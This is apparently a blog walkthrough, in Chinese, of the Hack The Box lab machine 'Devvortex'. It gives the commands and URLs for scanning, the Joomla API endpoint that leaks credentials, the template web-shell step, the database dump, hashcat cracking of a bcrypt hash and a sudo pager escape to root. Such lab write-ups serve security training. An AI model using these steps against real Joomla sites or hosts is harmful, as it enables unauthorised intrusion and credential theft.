首页 > 其他分享 >【HTB】 Devvortex 红队 easy

【HTB】 Devvortex 红队 easy

时间:2023-12-07 18:13:08浏览次数:30  
标签:红队 HTB 查看 dev 获取 Devvortex txt root htb

1、端口扫描

2、网页检测

发现一个表单,查看源代码发现是假表单

可能发现一个自定义域名

3、子域名扫描

gobuster dir  -w /usr/share/dirb/wordlists/common.txt -u http://dev.devvortex.htb/ --no-error

4、目录扫描

没啥收获

5、页面登录

1)访问

http://dev.devvortex.htb/administrator/

2)查看网站信息

访问下列网址

http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

获取到账号密码

6、页面检测

获取源代码

7、验证

经过验证,error.php 可用

访问

http://dev.devvortex.htb/templates/cassiopeia/error.php

8、利用

监听端口

写入 shell

访问

http://dev.devvortex.htb/templates/cassiopeia/error.php

9、获取 user.txt

1)查看信息

查看用户

ls /home

查看路径

pwd

查看文件

2)查看配置文件

连接数据库

mysql -u lewis -p

3)查看数据库

show databases;
use joomla;
show tables;
select * from sd4fg_users;

将获取的密码保存至本地

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho' > pass.txt

4)hash破解

hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt
hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

5)ssh 连接

6)获取 user.txt

cat /home/logan/user.txt

10、获取 root.txt

1)查看 bash 权限

2)利用 sudo 提权

需要连接 pid,连接中将 pid 中断,然后获取 root 权限

a. 手动弄个 pid

b. 连接

c. kill pid

d. 获取权限

3)获取 root.txt

!cat /root/root.txt

标签:红队,HTB,查看,dev,获取,Devvortex,txt,root,htb
From: https://www.cnblogs.com/IFS-/p/17883477.html

相关文章

  • 红队开发学习----魔改cobaltstrike学习(持续更新)
    目录环境和工具准备反编译CobaltStrike_4.4_000.jarIdea项目HelloWorld测试代码去除凭证读取teamserver端配置修改端口证书profile配置JA3|JA3S/JARM指纹修改源码层面修改stager导致配置泄漏修改xor密钥(未进行,没研究明白,怕改崩了)修改stager下载路径的长度修复一个漏洞参考文......
  • HTB Pilgrimage
     nmap扫一下发现80和22端口开放。 改hosts文件访问域名pilgrimage.htb 直接就是一个文件上传,尝试有没有文件上传漏洞。发现无论任何类型的文件,会将所有文件重命名并加上png或jpg后缀,但从从文件上传这个点突破是有点困难的。尝试其他的方法,扫一下这个网站,看看有没有敏感......
  • HTB Codify
     第一步,和上次一样,改hosts文件,域名对应ip。信息收集nmap扫一下:└─$nmap-sV10.10.11.239StartingNmap7.93(https://nmap.org)at2023-11-1715:58HKTNmapscanreportforcodify.htb(10.10.11.239)Hostisup(0.31slatency).Notshown:983closedtcppo......
  • htb-Web Requests
    HTTP1)Togettheflag,starttheaboveexercise,thenusecURLtodownloadthefilereturnedby'/download.php'intheservershownabove.curlIP/download.phpHTTPRequestsandResponses1)WhatistheHTTPmethodusedwhileinterceptingthe......
  • htb-cozyhosting
    HTB-CozyHostinghttps://app.hackthebox.com/machines/CozyHosting──(kwkl㉿kwkl)-[~]└─$tail-l/etc/hosts1......
  • HTB-vaccine靶场练习
    靶机地址:10.129.198.90端口扫描nmap-sC-A10.129.198.90扫描后,得到端口21,22,80,操作系统为Ubuntu,21端口为ftp协议可以进行匿名登录,且存在文件backup.zip,和一些路由信息使用匿名用户登录ftp,帐号anonymous,密码为空dir查看当前目录下的文件使用get下载文件使用unzip......
  • 红队技巧5:利用todesk远程上线
    红队技巧5:利用todesk远程上线前言在内网渗透的时候,有时候会存在杀毒软件使得不好执行一些命令这时候,你发现了存在todesk进程,测试可以利用todesk进行远程上线实验开始(模拟实战中getshell后的操作)1.下载todeskhttps://www.todesk.com/download.html2.放到虚拟机里和本......
  • HTB-oopsie靶场练习
    靶机地址:10.129.130.57攻击机地址:10.10.14.185端口扫描nmap-sV-sC10.129.130.57访问10.129.130.57,对一些可能有用的信息进行记录打开burp,刷新网页,点击HTTPhistory,注意到/cdn-cgi/login/script.js试着访问http://10.129.130.57/cdn-cgi/login/script.js......
  • EHole(棱洞)3.0 红队重点攻击系统指纹探测工具
    https://github.com/lemonlove7/EHole_magic 在进行web打点时,信息收集中对目标进行指纹识别是必不可少的一个环节,使用EHole识别出来的重点资产还要用其他漏洞利用工具去检测,非常的不方便,在原本的基础上加了个漏洞检测功能。提打点的效率。(不影响原版功能的使用)运行流程对资产......
  • HTB 靶场笔记 ACCESS wakeUP
    AccessSYNOPSISAccessisan"easy"difficultymachine,thathighlightshowmachinesassociatedwiththephysicalsecurityofanenvironmentmaynotthemselvesbesecure.AlsohighlightedishowaccessibleFTP/filesharesoftenleadtogetting......